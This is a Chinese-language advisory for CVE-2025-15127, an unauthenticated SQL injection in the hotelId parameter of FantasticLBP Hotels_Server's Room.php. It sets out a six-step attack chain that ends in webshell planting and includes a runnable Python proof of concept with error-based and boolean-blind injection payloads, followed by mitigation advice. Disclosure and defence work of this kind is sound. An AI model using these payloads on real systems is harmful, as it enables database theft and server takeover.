CVE-2025-15127 FantasticLBP Hotels_Server SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15127

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FantasticLBP Hotels_Server

漏洞概述

CVE-2025-15127是FantasticLBP Hotels_Server中的一个高危SQL注入漏洞。该漏洞存在于/controller/api/Room.php文件中的hotelId参数处理逻辑中，由于未对用户输入进行充分的过滤和参数化处理，攻击者可以通过构造恶意的SQL语句片段实现数据库注入攻击。此漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络层面，无需认证即可利用，威胁评级较高。攻击者成功利用此漏洞可读取、修改或删除数据库中的敏感信息，包括酒店预订数据、用户个人信息、财务记录等。鉴于该漏洞的利用代码已在互联网上公开披露，且厂商在接到安全通知后未做出任何响应，建议使用该系统的用户立即采取防护措施，避免遭受恶意攻击。

技术细节

该SQL注入漏洞位于FantasticLBP Hotels_Server的Room.php API接口文件中。漏洞的根本原因是在处理hotelId参数时，直接将用户可控的输入拼接到SQL查询语句中，缺少必要的输入验证和参数化查询保护。攻击者可以通过在hotelId参数中注入SQL特殊字符和命令，如单引号、UNION SELECT、AND条件判断等语句片段，实现联合查询、条件判断延时注入或报错注入等攻击手法。由于该接口无需认证即可访问（PR:N），攻击者可以直接通过HTTP请求向目标服务器发送恶意构造的请求包。在实际攻击场景中，攻击者可能首先通过报错注入获取数据库版本和表结构信息，然后利用UNION注入提取敏感数据，最终可能通过 INTO OUTFILE 或其他方式尝试获取服务器权限。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先访问目标网站的/controller/api/Room.php接口，确认API存在并测试基本访问

STEP 2

步骤2

漏洞探测：构造包含SQL特殊字符（如单引号'）的hotelId参数值，触发数据库报错以确认SQL注入漏洞存在

STEP 3

步骤3

数据库指纹识别：通过注入语句获取数据库版本、数据库类型、表前缀等关键信息

STEP 4

步骤4

数据提取：利用UNION注入或布尔盲注技术，逐步提取数据库中的敏感表结构（如用户表、订单表、酒店信息表等）

STEP 5

步骤5

敏感数据窃取：获取管理员账号密码、用户个人信息、预订记录、支付信息等敏感数据

STEP 6

步骤6

权限提升或持久化：尝试通过INTO OUTFILE写入webshell或利用获取的凭据登录后台管理系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15127 SQL Injection PoC
# Target: FantasticLBP Hotels_Server /controller/api/Room.php
# Parameter: hotelId

def exploit_sqli(url, hotel_id_payload):
    """
    SQL Injection exploitation function
    Args:
        url: Target base URL
        hotel_id_payload: Malicious SQL payload for hotelId parameter
    Returns:
        Server response content
    """
    target_url = f"{url}/controller/api/Room.php"
    params = {
        'hotelId': hotel_id_payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15127.py <target_url>")
        print("Example: python cve-2025-15127.py http://target.com")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    
    # Test basic SQL injection - error-based
    print("[*] Testing CVE-2025-15127 SQL Injection...")
    payload = "1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,VERSION(),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) -- "
    print(f"[+] Sending payload: {payload}")
    result = exploit_sqli(base_url, payload)
    print(f"[+] Response:\n{result}")
    
    # Test boolean-based blind injection
    print("\n[*] Testing boolean-based blind injection...")
    true_payload = "1' AND 1=1 -- "
    false_payload = "1' AND 1=2 -- "
    
    print(f"[+] True condition payload: {true_payload}")
    result_true = exploit_sqli(base_url, true_payload)
    print(f"[+] True response length: {len(result_true)}")
    
    print(f"[+] False condition payload: {false_payload}")
    result_false = exploit_sqli(base_url, false_payload)
    print(f"[+] False response length: {len(result_false)}")
    
    print("\n[*] PoC completed. Analyze responses for successful injection.")

if __name__ == "__main__":
    main()

影响范围

FantasticLBP Hotels_Server <= 67b44df162fab26df209bd5d5d542875fcbec1d0

防御指南

临时缓解措施

由于厂商未响应安全通知，建议立即采取以下临时缓解措施：1) 在Web应用层或WAF设备上添加SQL注入防护规则，对包含单引号、UNION、SELECT等SQL关键字的请求进行拦截；2) 限制/controller/api/Room.php接口的访问权限，配置IP白名单或临时关闭该接口；3) 对数据库账户权限进行最小化配置，移除不必要的文件读写和执行权限；4) 启用数据库操作审计日志，监控异常查询行为；5) 建议使用静态代码分析工具对整个项目进行安全审计，排查是否存在其他类似注入点。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15127
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15127
3 Details https://www.cvedetails.com/cve/CVE-2025-15127/
4 VulDB https://vuldb.com/cve/CVE-2025-15127
5 Link https://github.com/liangmingpku/CVE/issues/1
6 Link https://vuldb.com/?ctiid.338505
7 Link https://vuldb.com/?id.338505
8 Link https://vuldb.com/?submit.711809